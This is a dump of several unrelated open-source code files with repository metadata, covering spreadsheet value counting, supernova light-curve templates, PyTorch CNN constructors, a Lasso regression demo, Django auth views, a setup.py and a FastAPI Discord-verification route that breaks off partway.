Count values occurences in each attribute column
input table:
entity | attr_1 | attr_2 | ... | attr_n
0 | a | b | ... | a
1 | b | c | ... | b
2 | b | c | ... | c
3 | a | f | ... | d
4 | c | a | ... | f
output table:
| a | b | c | d | f |
attr_1 | 2 | 2 | 1 | 0 | 0 |
attr_2 | 1 | 1 | 2 | 0 | 1 |
attr_n | 1 | 1 | 1 | 1 | 1 |
It is possible filter entities and attribute values
"""
from glass.tbl.xls.fld import get_columns_position
from glass.tbl.xls.summ import count_values_column
from glass.tbl.xls.summ import count_values_column_if_entity_exists
# Open file
__xls = xlrd.open_workbook(xls, on_demand=True)
if entities_sheet and entities_id and entities_filter:
filters = entities_filter.split(';')
filters_map = {}
for flt in filters:
col_filter, val_filter = flt.split('=')
filters_map[col_filter] = val_filter
__entities_sheet = __xls.sheet_by_name(entities_sheet)
int_col = [entities_id] + filters_map.keys()
cols_position = get_columns_position(
__entities_sheet, int_col
)
entities_map = []
for row in range(1, __entities_sheet.nrows):
__id = __entities_sheet.cell(
row, cols_position[entities_id]).value
c = 0
for col_filter in filters_map:
__filter = __entities_sheet.cell(
row, cols_position[col_filter]).value
if __filter != filters_map[col_filter]:
c += 1
break
if c:
continue
entities_map.append(__id)
else:
entities_map = None
attr_sheet = __xls.sheet_by_name(data_sheet)
data = {}
registed_values = []
values_filter = values_filter if type(values_filter) == list else \
[values_filter] if type(values_filter) == str else None
for col in range(1, attr_sheet.ncols):
col_name = attr_sheet.cell(0, col).value
if not entities_map:
values_count = count_values_column(attr_sheet, col, values_filter)
else:
values_count = count_values_column_if_entity_exists(
attr_sheet, col, entities_map, values_filter
)
registed_values.extend(values_count.keys())
data[col_name] = values_count
registed_values = list(set(registed_values))
# Write output
out_xls = xlwt.Workbook()
new_sheet = out_xls.add_sheet(
os.path.splitext(os.path.basename(output))[0]
)
# columns
for i in range(len(registed_values)):
new_sheet.write(0, i+1, registed_values[i])
# Write values
r=1
for row in data:
new_sheet.write(r, 0, row)
for col in range(len(registed_values)):
if registed_values[col] in data[row]:
new_sheet.write(r, col+1, data[row][registed_values[col]])
r += 1
out_xls.save(output)
__xls.release_resources()
del __xls
| jasp382/glass | glass/tbl/xls/anls.py | anls.py | py | 18,189 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "decimal.Decimal",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "decimal.Decimal",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "decimal.Decimal",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line... |
71390250985 | #!/usr/bin/env python
import sys,os,glob, inspect
#,re,numpy,math,pyfits,glob,shutil,glob
import optparse
import scipy as sp
import numpy as np
import pylab as pl
from scipy.interpolate import interp1d
from scipy import optimize
#from mpmath import polyroots
import time
import pprint, pickle
#from snclasses import myass#setupvars
bandscols = {'U':1,'u':1,'B':3,'V':5,'R':7,'I':9,'g':13, 'r':15, 'i':17,'z':11, 'w1':-1,'w2':-2,'m2':-3}
TEMPLDIR=os.path.realpath(os.path.abspath(os.path.split(inspect.getfile\
( inspect.currentframe() ))[0]))
MINX,MAXX=-10,40
NEW_X=np.linspace(MINX,MAXX,(MAXX-MINX)*10)
def smoothListGaussian(data,strippedXs=False,degree=15):
window=degree*2-1
weight=np.array([1.0]*window)
weightGauss=[]
for i in range(window):
i=i-degree+1
frac=i/float(window)
gauss=1/(np.exp((4*(frac))**2))
weightGauss.append(gauss)
weight=np.array(weightGauss)*weight
smoothed=np.zeros(len(data),float)
for i in range(len(smoothed)-window):
smoothed[i+window/2+1]=np.sum(np.array(data[i:i+window])*weight)/np.sum(weight)
smoothed[0:window/2]=data[0:window/2]
smoothed[-window/2:]=data[-window/2:]
return np.array(smoothed)
class setupvars:
def __init__(self):
self.sntypes = ['Ib','Ic','IIb','Ic-bl','IIb-n']
self.bands = ['U','u','B','V','g','R','I','r','i', 'J','H','K','w1','w2','m2']
self.bandoffsets = {'U': 2, 'u': 2, 'B': 1, 'b' : 1,
'g' : 0, 'V': 0, 'R': -1, 'I': -2,
'r': -1, 'i': -2,
'J': -3, 'H': -4, 'K': -5, 'w1': 3, 'm2': 4, 'w2': 5}
#cfa only bands
self.bandsnonir =['U','u','B','V','R','I','r','i']
self.bandsnir =['J','H','K']
self.bandsindex ={'U':0,'u':0,'B':1,'V':2,'R':3,'I':4,'r':5,'i':6,
'J':7,'H':8,'K':9, 'w1':10,'w2':11,'m2':12}
self.cbands = ['U-B','B-i',
'B-I','B-V',
'V-R','R-I','r-i','V-r', 'V-i','V-I',
'V-H', 'r-K','V-K','H-K',
'B-r', 'B-J', 'B-H', 'B-K', 'H-i', 'J-H', 'K-J']
self.cs = {'U-B':0,'B-V':1,'V-R':2,'R-I':3,'r-i':4,'V-r':5, 'V-i':6,
'V-I':7, 'V-H':8,'I-H':9,'H-J':9,'J-K':10,
'B-I':11,'B-i':11,'r-K':12,'V-K':13,'H-K':14,
'B-r':15,'B-R':19, 'B-J':16, 'B-H':17, 'B-K':18}
self.photcodes = {'U':('01','06','Ul'), 'B':('02','07','Bl'),
'V':('03','08','Vl'), 'R':('04','09','Rl'),
'I':('05','0a','Il'), 'r':('13','0b','rl'),
'i':('14','0c','il'), 'u':('15','15','ul'),
'H':('H','H','Hl'), 'J':('J','J','Jl'),
'K':('K','K','Kl'),
'm2':('m2','m2','m2'), 'w2':('w2','w2','w2'),
'w1':('w1','w1','w1'), 'g':('g','g','g')}
self.mycolors = {'U':'k','u':'k','B':'#0066cc',
'g': '#47b56c', 'V':'#47b56c','R':'#b20000','I':'m',
'r':'#b20000','i':'m',
'J':'#4F088A','H':'#FFB700','K':'#A4A4A4',
'm2':'#708090', 'w2':'#a9b2bc', 'w1':'#434d56'}
self.mycolorcolors = {'U-B':'k','B-V':'#0066cc','V-R':'#47b56c','R-I':'#b20000',
'V-I':'m','V-i':'m','V-r':'#47b56c','r-i':'#b20000',
'V-H':'#9999EE','I-H':'#9999EE','J-K':'#70B8FF','H-J':'#FFCC80',
'r-K':'purple', 'V-K':'SlateBlue', 'B-I':'#0B0B3B',
'H-K':'#FFCC80',
'B-i':'#0B0B3B','B-r':'#0B0B3B' ,'B-R':'#0B0B3B',
'w1':'k','w2':'k','m2':'k'}
self.myshapes = {'U':'^','u':'^','B':'s','V':'o','g':'<',
'R':'v','I':'>','r':'d','i':'h',
'J':'^','H':'s','K':'o',
'w1':'v','w2':'v','m2':'v'}
self.mytypecolors = {'Ib':'k','Ic':'b','IIb':'g','Ic-bl':'r','IIb-n':'y', 'other':'k'}
self.mysymbols = {'Ib':'o','Ic':'s','IIb':'^','Ic-bl':'v','IIb-n':'>', 'other':'x'}
self.mylines = {'Ib':'dashed','Ic':'solid','IIb':'solid','Ic-bl':'dotted',
'IIb-n':'solid', 'other':'solid'}
self.instcodes = {'kepler':0,'shooter':0,'mini':1}
self.insts =['shooter', 'kepler', 'mini']
self.ebmvs={'83V':0.0178, '93J':0.0690,'94I':0.0302,'95F':0.0311,
'95bb':0.0948,'96cb':0.0262,'97X':0.0237,'97dq':0.0382,
'97ef':0.0366,'98dt':0.0219,'98fa':0.0382,'00H':0.1964,
'99dn':0.0451,'01ai':0.0081,'01ej':0.0460,'01gd':0.0098,
'02ap':0.0620,'02ji':0.0217,'03dh':0.0214,'03jd':0.0784,
'04aw':0.0180,'04ao':0.0893,'04dk':0.1357,'04dn':0.0415,
'04eu':0.0466,'04fe':0.0210,'04ff':0.0281,'04ge':0.0754,
'04gk':0.0247,'04gq':0.0627,'04gt':0.0398,'04gv':0.0286,
'05U':0.0143,'05ar':0.0394,'05az':0.0097,'05bf':0.0385,
'05da':0.2483,'05ek':0.1811,'05eo':0.0585,'05hg':0.0901,
'05kf':0.0378,'05kl':0.0219,'05kz':0.046,'05la':0.0100,
'05mf':0.0153,'05nb':0.0320,'06F':0.1635,'06T':0.0647,
'06aj':0.1267,'06ba':0.0452,'06bf':0.0216,'06cb':0.0094,
'06ck':0.0245,'06el':0.0973,'06ep':0.0310,'06fo':0.0250,
'06gi':0.0205,'06ir':0.0393,'06jc':0.0173,'06lc':0.0556,
'06ld':0.0144,'06lv':0.0245,'06ss':0.0178,'07C':0.0363,
'07D':0.2881,'07I':0.0250,'07ag':0.0250,'07aw':0.0338,
'07bg':0.0179,'07ce':0.0200,'07cl':0.0370,'07gr':0.0535,
'07hb':0.0518,'07iq':0.1182,'07ke':0.0954,'07kj':0.0691,
'07ru':0.2254,'07rz':0.1723,'07uy':0.0194,'08D':0.0194,
'08an':0.0450,'08aq':0.0383,'08ax':0.0186,'08bo':0.0513,
'08cw':0.0060,'08hh':0.0427,'09bb':0.0844,'09er':0.0389,
'09iz':0.0729,'09jf':0.0971,'09mg':0.0388,'09K':0.0491,
'03bg':0.0197,'10as':0.1472,'11dh':0.0308,'11ei':0.0506,
'07Y':0.0184, '99ex':0.0172, '07c':0.0363,'07d':0.2881,
'07i':0.0250,'06f':0.1635,'06t':0.0647,'13df':0.017,
'98bw':0.0509, '03lw':0.9040,'10bh':0.1000,'13dx':0.0368,
'11bm':0.0289,'11fu':0.0664,'11hs':0.0107,'13cq':0.0174,
'12bz':0.0303,'PTF10vgv':0.1382,'PTF10qts':0.0252,'iPTF13bvn':0.0436}
# self.ebmvhost={'02ap':0.03,'03jd':0.10,'04aw':0.352,'07Y':0.09,'07gr':0.038,'07ru':0.01,'08D':0.59,'08ax':0.28}
# self.ebmvhost={'02ap':0.03,'03jd':0.10,'04aw':0.352,'07gr':0.038,'07ru':0.01,'08D':0.5406}#,'08ax':0.3814}
# self.ebmvhost={'02ap':0.03,'04aw':0.352,'07gr':0.03,'08D':0.5406}
self.ebmvhost={'02ap':0.03,'03jd':0.10,'04aw':0.352,'07gr':0.038,'99ex':1.0,#Hamuy02
'07ru':0.01,'08D':0.5406,'07Y':0.112,#Stritzinger09
'08ax':0.4, '03bg':0,'11ei':0.18,'11dh':0,#Taubenberger11
#'09jf':0.05, #Valenti11
# '08bo':0.24,
# '08ax':0.3814,
# '04dk':0.201,'04dn':0.5265,
# '04fe':0.294,
# #'04ff':0.274,
# '04gq':0.19,'05az':0.43,'05kz':0.47,
# '05hg':0.63,
# '05mf':0.383,
# '06el':0.21,
# #'06C':0.65,
# '05bf':0.007,
# '07uy':0.601, '09jf':0.0146
'11bm': 0.032# valenti13
}
self.ebmvcfa={'02ap':0.03,'03jd':0.10,'04aw':0.352,
'07ru':0.01,'08D':0.5406,
'06el' : 0.147 , '06ep': 0.448 ,'06fo' : 0.201,
'07gr': 0.0462,
'07kj' : 0.295 ,'07uy' : 0.378 ,'08bo' : 0.294,
'09er' : 0.110 ,'09iz' : 0.064 ,'09jf' : 0.045,
'05bf': 0.05 ,'05hg' : 0.244 ,'05kl' : 1.344,
'05kz' : 0.437 ,'05mf' : 0.231 ,'06aj' : 0.141,
'06bf' : 0.368 ,'06F' : 0.533 ,'06lv' : 0.574 ,
'06T' : 0.397 ,'07ag' : 0.627 ,'07C' : 0.650 ,
'07ce' : 0.082 ,'07cl' : 0.258 ,'08D' : 0.572 }
#'09iz':0.1,
#07grxt Drout reddening via Chen 2014 was 0.06, drout is 0.038
#05hg Cano reddening 0.63 WRONG! from drout photometry?
#09iz guessing the reddening
##'06aj':0.04, gives trouble although reddening should be well constrained!!
self.AonEBmV={'U': 5.434, 'u':5.155, 'B': 4.315, 'V': 3.315, 'R': 2.673,
'I': 1.940, 'r': 2.751,'i': 2.086,
'J': 0.902,'H': 0.576, 'K': 0.367,
'uu':5.155,'vv':3.315,'w1':4.3,'w2':4.3,'m2':4.3}
self.uberTemplate = {}
self.meansmooth = {}
for b in self.bands:
self.meansmooth[b] = None
self.uberTemplate[b] = {}
class atemplate:
def __init__(self):
self.median=None
self.mean =None
self.std =None
self.x =None
self.tempfuncy=None
class templatesn:
def __init__(self, sn, dist=0.0, e_dist=0.0, incl=0.0, ebv=0.0, sntype='',
mjdmax=0.0, e_mjdmax=0.0, ebmvhost=0.0, vmr=0.0,peak=0.0,
e_peak=0.0, peak_ap=0.0, e_peak_ap=0.0,
phot=None, absphot=None, normphot=None,
new_x=None, new_y=None, yfunc=None):
self.sn=sn
self.dist=dist
self.e_dist=e_dist
self.incl=incl
self.ebv=ebv
self.sntype=sntype
self.mjdmax=mjdmax
self.e_mjdmax=e_mjdmax
self.ebmvhost=ebmvhost
self.vmr=vmr
self.peak=peak
self.e_peak=e_peak
self.peak_ap=peak_ap
self.e_peak_ap=e_peak_ap
self.phot = phot
self.absphot = absphot
self.normphot = normphot
if new_x:
self.new_x = new_x
else:
self.new_x = NEW_X
self.new_y = new_y
self.yfunc=yfunc
class gptemplclass:
def __init__(self):
self.su=setupvars()
self.gptemplate = {}
for b in self.su.bands:
self.gptemplate[b]=atemplate()
self.typetemplate= {'Ib':None,'Ic':None,'IIb':None,'Ic-bl':None,'IIb-n':None}
class Mytempclass:
def __init__(self):
self.su=setupvars()
self.template = {}
for b in self.su.bands:
self.template[b]=atemplate()
self.typetemplate= {'Ib':None,'Ic':None,'IIb':None,'Ic-bl':None,'IIb-n':None}
def calctemplate(self,tptype=None):
thissn = mysn(f, addlit=True)
thissn.readinfofileall(verbose=False, earliest=False, loose=True)
if tptype is None:
tytype = self.typetemplate
def loadtemplate(self, b, x=None,mean=None,median=None,std=None):
if b in self.su.bands:
print ("ready to load temaplte")
self.template[b].x=x
self.template[b].mean=mean
self.template[b].median=median
self.template[b].std=std
else:
print ("wrong band ", b)
def gettempfuncy(self,b):
if 1:#not self.template[b].tempfuncy():
from scipy.interpolate import interp1d
self.template[b].tempfuncy = interp1d(self.template[b].x,
self.template[b].mean, kind='cubic',
bounds_error=False)
if np.sum(np.isnan(self.template[b].tempfuncy(self.template[b].x))) == \
len(self.template[b].x) or \
np.std(np.array(self.template[b].tempfuncy(self.template[b].x)\
[~np.isnan(self.template[b].tempfuncy(
self.template[b].x))]))>10:
self.template[b].tempfuncy = interp1d(self.template[b].x,
self.template[b].mean,
kind='linear', bounds_error=False)
def tempfuncstd(self,b):
from scipy.interpolate import interp1d
tempfuncstd = interp1d(self.template[b].x,self.template[b].std,
kind='cubic', bounds_error=False)
if np.sum(np.isnan(tempfuncstd(self.template[b].x)))==len(self.template[b].x) \
or np.std(np.array(tempfuncstd(self.template[b].x)\
[~np.isnan(tempfuncstd(self.template[b].x))]))>10:
tempfuncstd = interp1d(self.template[b].x,self.template[b].std,
kind='linear', bounds_error=False)
def loadtemplatefile(self, new=False, sntype=None):
for b in self.su.bands:
print (b, self.template[b].mean)
if self.template[b].mean:
print ("template already read in")
continue
###preparing template functions"
if new:
if not sntype:
print ("must input sn type")
sys.exit()
myfile ='templates/new/mytemplate'+b+'_'+sntype+'.pkl'
else:
myfile='templates/mytemplate'+b+'.pkl'
if not os.path.isfile(myfile):
print ("file not there: ", myfile)
continue
pkl_file = open(myfile,'rb')
self.template[b] = pickle.load(pkl_file)
pprint.pprint(self.template[b])
def templateupdate(self,s):
if self.typetemplate[sn.sntype]==None:
typetemplate[sn.sntype]=copy.deepcopy(template)
else:
for b in ['V','R']:#su.bands:
new_x = NEW_X
new_y = interp1d(sn.photometry[b]['mjd']-sn.Vmax, s['normphot'],
kind='cubic', bounds_error=False)(s['new_x'])
print (np.sum(np.isnan(np.array(new_y))), np.isnan(np.array(new_y).all()),
len(new_y))
if np.sum(np.isnan(np.array(new_y)))== len(new_y):
print ("REDOING SPLINE WITH LINEAR")
new_y = interp1d(sn.photometry[b]['mjd']-sn.Vmax,
sn.photometry[b]['mag']-sn.maxdata,
kind='linear', bounds_error=False)(s['new_x'])
if np.std(np.array(new_y[~np.isnan(new_y)]))>10:
new_y = interp1d(sn.photometry[b]['mjd']-sn.Vmax,
sn.photometry[b]['mag']-sn.maxdata,
kind='linear', bounds_error=False)(s['new_x'])
print (s['new_y'], s['normphot'])
print (s['sn'],np.min(s['new_y'][~np.isnan(s['new_y'])]))
typetemplate[sn.sntype][b]=stats.stats.nanmean([new_y,
typetemplate[sn.sntype][b]],
axis=0)
typetemplate[sn.sntype][b]=stats.stats.nanmean([new_y,
typetemplate[sn.sntype][b]],
axis=0)
def mycavvaccaleib(x,p, secondg=False,earlyg=False, verbose=False):
if verbose:
print ("\np,x",p,x)
try:
#needed in case i am passing an array of 1 element for x
if verbose:
print (len(x))
if len(x)==1:
x=x[0]
except:
pass
latebump=False
if p is None:
return (x)*99e9
if p[8]>p[1]:
if verbose:
print ("late bump")
latebump=True
'''
fit the magnitudes with a vacca leibundgut (1997) analytical model
p is the parameter list
if secondg=1: secondgaussian added
if secondg=0: secondgaussian not
parameters are:
p[0]=first gaussian normalization (negative if fitting mag)
p[1]=first gaussian mean
p[2]=first gaussian sigma
p[3]=linear decay offset
p[4]=linear decay slope
p[5]=exponxential rise slope
p[6]=exponential zero point
p[7]=second gaussian normalization (negative if fitting mag)
p[8]=second gaussian mean
p[9]=second gaussian sigma
'''
g=p[4]*(x)+p[3]
g+=p[0]*np.exp(-(x-p[1])**2/p[2]**2)
g*=(np.exp(-p[5]*(x-p[6]))+1)
if latebump and earlyg:
g*=1e5
if secondg:
g+=p[7]*np.exp(-(x-p[8])**2/p[9]**2)
if latebump and p[8]-p[1]<15 :
g+=p[7]*np.exp(-(x-p[8])**2/p[9]**2)
try:
len(g)
except TypeError:
g=[g]
#(np.zeros(len(g),float)+1)
if p[8]-p[1]>70:
g+=(np.zeros(len(g),float)+1)
return g
def loadlitlist(band):
print (TEMPLDIR)
try:
f=TEMPLDIR+"/"+"templatelist"+band+".txt"
templates=np.loadtxt(f,usecols=(0,1,2,3,4,5,7,8,9,10,13,14,15,16),
dtype={'names': ('sn','dist','e_dist','incl','ebv',
'type','mjdmax','e_mjdmax',
'peak_ap','e_peak_ap','ebmvhost',
'vmr','peak','e_peak'),
'formats': ('S6','f','f','f','f','S5','f',
'f','f','f','f','f','f','f')},
skiprows=1, comments='#')
print ("reading files list ",f," worked")
except:
print ("reading files list ",f," failed")
sne=[]
print ("the templates are: ",templates['sn'])
for i,sn in enumerate(templates['sn']):
sne.append(templatesn(sn,dist=templates[i]['dist'],
e_dist=templates[i]['e_dist'],
incl=templates[i]['incl'],
ebv=templates[i]['ebv'],
sntype=templates[i]['type'],
mjdmax=templates[i]['mjdmax'],
e_mjdmax=templates[i]['e_mjdmax'],
ebmvhost=templates[i]['ebmvhost'],
vmr=templates[i]['vmr'],
peak=templates[i]['peak'],
e_peak=templates[i]['e_peak'],
peak_ap=templates[i]['peak_ap'],
e_peak_ap=templates[i]['e_peak_ap']))
# for i,sn in enumerate(templates['sn']):
sne[i].phot=(np.loadtxt(TEMPLDIR+"/"+"sn"+sn+".dat",
usecols=(0,bandscols[band], bandscols[band]+1),
skiprows=1, unpack=1))
#dereddening
sne[i].phot[1]+=3.2*sne[i].ebv
sne[i].absphot=sne[i].phot[1]-(sne[i].peak_ap-sne[i].peak)
sne[i].normphot=sne[i].absphot-sne[i].peak
#sne[i]['phot'][1]-2.5*np.log10((sne[i]['dist']/1e6/10.0)**2)
# mysn=np.where(templates['sn']=='1994I')[0]
# print sne[mysn]
## Mv = m - 2.5 log[ (d/10)2 ].
## flux = 10**(-lc['mag']/2.5)*5e10
## dflux = flux*lc['dmag']/LN10x2p5
# print sn
#
print ("loaded sne")
return sne, templates
def splinetemplates(sne):
for s in sne:
# pl.figure()
# minx=max(-20.1,min(s['phot'][0]-s['mjdmax']))+0.1
# maxx=min(40.1,max(s['phot'][0]-s['mjdmax']))-0.1
s.new_x = NEW_X
s.new_y = interp1d(s.phot[0]-s.mjdmax, s.normphot, kind='cubic',
bounds_error=False)(s.new_x)
NaN = float('nan')
print (np.sum(np.isnan(np.array(s.new_y))), np.isnan(np.array(s.new_y).all()),
len(s.new_y))
if np.sum(np.isnan(np.array(s.new_y)))== len(s.new_y):
print ("REDOING SPLINE WITH LINEAR")
s.new_y = interp1d(s.phot[0]-s.mjdmax, s.normphot, kind='linear',
bounds_error=False)(s.new_x)
if np.std(np.array(s.new_y[~np.isnan(s.new_y)]))>10:
s.new_y = interp1d(s.phot[0]-s.mjdmax, s.normphot, kind='linear',
bounds_error=False)(s.new_x)
# print (s['new_y'], s['normphot'])
print (s.sn,np.min(s.new_y[~np.isnan(s.new_y)]))
return sne
| fedhere/SESNCfAlib | templates/templutils.py | templutils.py | py | 21,005 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.realpath",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path.split",
"li... |
31594578113 | import torch
import torchvision
import torch.nn as nn
def get_vgg16():
vgg16 = torchvision.models.vgg16(pretrained=False)
weight = vgg16.features[0].weight.clone()
vgg16.features[0] = nn.Conv2d(1, 64, kernel_size=(3, 3), stride=(1, 1), padding=1)
with torch.no_grad():
vgg16.features[0].weight[:, 0] = weight[:, 0]
vgg16.classifier[6] = nn.Linear(in_features=4096, out_features=4, bias=True)
return vgg16
def get_resnet50():
resnet50 = torchvision.models.resnet50(pretrained=False)
weight = resnet50.conv1.weight.clone()
resnet50.conv1 = nn.Conv2d(1, 64, kernel_size=(7, 7), stride=(2, 2), padding=3)
with torch.no_grad():
resnet50.conv1.weight[:, 0] = weight[:, 0]
resnet50.fc = nn.Linear(in_features=2048, out_features=4, bias=True)
return resnet50
def get_squeezenet():
squeezenet = torchvision.models.squeezenet1_0(pretrained=False)
weight = squeezenet.features[0].weight.clone()
squeezenet.features[0] = nn.Conv2d(1, 96, kernel_size=(7, 7), stride=(1, 1), padding=1)
with torch.no_grad():
squeezenet.features[0].weight[:, 0] = weight[:, 0]
squeezenet.classifier[1] = nn.Conv2d(512, 4, kernel_size=(1, 1), stride=(1, 1))
return squeezenet
def get_resnext():
resnext = torchvision.models.resnext50_32x4d(pretrained=False)
weight = resnext.conv1.weight.clone()
resnext.conv1 = nn.Conv2d(1, 64, kernel_size=(7, 7), stride=(2, 2), padding=3)
with torch.no_grad():
resnext.conv1.weight[:, 0] = weight[:, 0]
resnext.fc = nn.Linear(2048, 4, bias=True)
return resnext
def get_densenet():
densenet = torchvision.models.densenet161(pretrained=False)
weight = densenet.features.conv0.weight.clone()
densenet.features.conv0 = nn.Conv2d(1, 96, kernel_size=(7, 7), stride=(2, 2), padding=3)
with torch.no_grad():
densenet.features.conv0.weight[:, 0] = weight[:, 0]
densenet.classifier = nn.Linear(2208, 4, bias=True)
return densenet
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad) | hariharan98m/distinctive-filter-learning-covid19 | std_arch.py | std_arch.py | py | 2,094 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torchvision.models.vgg16",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "torchvision.models",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.n... |
17978424885 | # 导入操作系统库
import os
# 更改工作目录
os.chdir(r"D:\softwares\applied statistics\pythoncodelearning\chap1\sourcecode")
# 导入基础计算库
import numpy as np
# 导入绘图库
import matplotlib.pyplot as plt
# 导入Lasso模型
from sklearn.linear_model import MultiTaskLasso, Lasso
# 导入绘图库中的字体管理包
from matplotlib import font_manager
# 实现中文字符正常显示
font = font_manager.FontProperties(fname=r"C:\Windows\Fonts\SimKai.ttf")
# 使用seaborn风格绘图
plt.style.use("seaborn-v0_8")
# 设置样本量,维度,回归模型中y的维度(响应变量的多元回归)
n_samples, n_features, n_tasks = 100, 30, 40
# 显著变量的个数
n_relevant_features = 5
# 初始化真实系数,是一个矩阵
coef = np.zeros((n_tasks, n_features))
# 时刻
times = np.linspace(0, 2 * np.pi, n_tasks)
# 设置随机数种子
np.random.seed(10)
# 生成真实系数
for k in range(n_relevant_features):
coef[:, k] = np.sin(
(1.0 + np.random.randn(1)) * times + 3 * np.random.randn(1)
)
# 生成X
X = np.random.randn(n_samples, n_features)
# 生成Y
Y = np.dot(X, coef.T) + np.random.randn(n_samples, n_tasks)
print("查看多元响应变量Y的情况:", Y[:5, :2], sep="\n")
# 建立Lasso模型,分别对Y的每一个分量做,提取系数
coef_lasso_ = np.array(
[
Lasso(alpha=0.5).fit(X, y).coef_ for y in Y.T
]
)
# 建立MultiLasso模型,提取系数
coef_multi_task_lasso_ = MultiTaskLasso(alpha=1.0).fit(X, Y).coef_
# 开始绘图
fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(8, 5))
# 用于展示稀疏二维数组的图形
axs[0].spy(coef_lasso_)
axs[0].set_xlabel("Feature")
axs[0].set_ylabel("Time (or Task)")
axs[0].text(10, 5, "Lasso")
axs[1].spy(coef_multi_task_lasso_)
axs[1].set_xlabel("Feature")
axs[1].set_ylabel("Time (or Task)")
axs[1].text(10, 5, "MultiTaskLasso")
fig.suptitle("Coefficient non-zero location")
plt.show()
fig.savefig("../codeimage/code15.pdf")
# 绘制第一个特征前的系数
feature_to_plot = 0
# 开始绘图
fig1, ax = plt.subplots(figsize=(6,6), tight_layout=True)
# 绘制coef的线图
ax.plot(
coef[:, feature_to_plot],
color="seagreen",
linewidth=2,
label="Ground truth"
)
# 绘制coef_lass0的线图
ax.plot(
coef_lasso_[:, feature_to_plot],
color="cornflowerblue",
linewidth=2,
label="Lasso"
)
# 绘制coef_task_lasso的线图
ax.plot(
coef_multi_task_lasso_[:, feature_to_plot],
color="gold",
linewidth=2,
label="MultiTaskLasso",
)
# 显示图例
ax.legend(loc="best")
# 设置纵轴范围
ax.set_ylim([-1.1, 1.1])
plt.show()
fig1.savefig("../codeimage/code16.pdf")
| AndyLiu-art/MLPythonCode | chap1/sourcecode/Python11.py | Python11.py | py | 2,671 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "matplotlib.font_manager.FontProperties",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "matplotlib.font_manager",
"line_number": 14,
"usage_type": "name"
},
{
"api_name":... |
13112139662 | from django.shortcuts import render, redirect, reverse
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login as auth_login, logout as auth_logout
from django.contrib import messages
from django.utils.translation import ugettext as _
from .forms import RegistrationForm
def login(request):
login_form = AuthenticationForm()
if request.user.is_authenticated():
return redirect('/')
if request.POST:
login_form = AuthenticationForm(request, data=request.POST)
if login_form.is_valid():
auth_login(request, login_form.get_user())
return redirect('/')
context = {
'form': login_form,
}
return render(request, template_name='account/login.html', context=context)
def logout(request):
auth_logout(request)
messages.add_message(request, messages.WARNING, _('You\'ve been logged out.'))
return redirect(reverse('login'))
def register(request):
register_form = RegistrationForm()
if request.user.is_authenticated():
return redirect('/')
if request.POST:
register_form = RegistrationForm(request.POST)
if register_form.is_valid():
user = register_form.save()
auth_login(request, user)
messages.add_message(request, messages.SUCCESS, _('Your account has been registered.'))
return redirect('/')
context = {
'form': register_form
}
return render(request, template_name='account/register.html', context=context) | roccolangeweg-old/infdev016b | account/views.py | views.py | py | 1,546 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.forms.AuthenticationForm",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.redirect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.forms.AuthenticationForm",
"line_number": 16,
... |
477387110 | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='mygrations',
version='1.0.6',
description='A general purpose migration tool for managing MySQL updates',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/cmancone/mygrations',
author='Conor Mancone',
author_email='cmancone@gmail.com',
license='MIT',
download_url='https://github.com/cmancone/mygrations/archive/v1.0.0.tar.gz',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
keywords='setuptools development migrations mysql',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
python_requires=">=3.6",
install_requires=[
'PyMySQL',
],
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
# data_files=[('/usr/local/bin', ['mygrate.py'])],
)
| cmancone/mygrations | setup.py | setup.py | py | 1,605 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "codecs.open",
"line_numbe... |
39274582010 | from fastapi import APIRouter, Depends, HTTPException
from pyairtable.api.table import Table
from pyairtable.formulas import match
from sentry_sdk import capture_message
from app.auth.auth_bearer import JWTBearer
from app.routers.attendees import update_attendee
from ..dependencies import get_mobile_table, get_registration_table
from ..auth.auth_handler import verify_jwt, decode_jwt
from ..models.attendee import UpdatedAttendee, recordToAttendee
router = APIRouter(prefix="/verify", tags=["verify"])
@router.get("/discord", dependencies=[Depends(JWTBearer())])
async def verify_discord(
email: str, disc_username: str, table: Table = Depends(get_mobile_table)
):
res = []
for i in table.all(formula=match({"Email": email})):
res.append(recordToAttendee(i))
if len(res) == 0:
e = HTTPException(
status_code=400,
detail="No user with specified email found.",
)
capture_message("No user with specified email found.")
raise e
else:
user = res[0]
if user.discord_id:
e = HTTPException(
status_code=400,
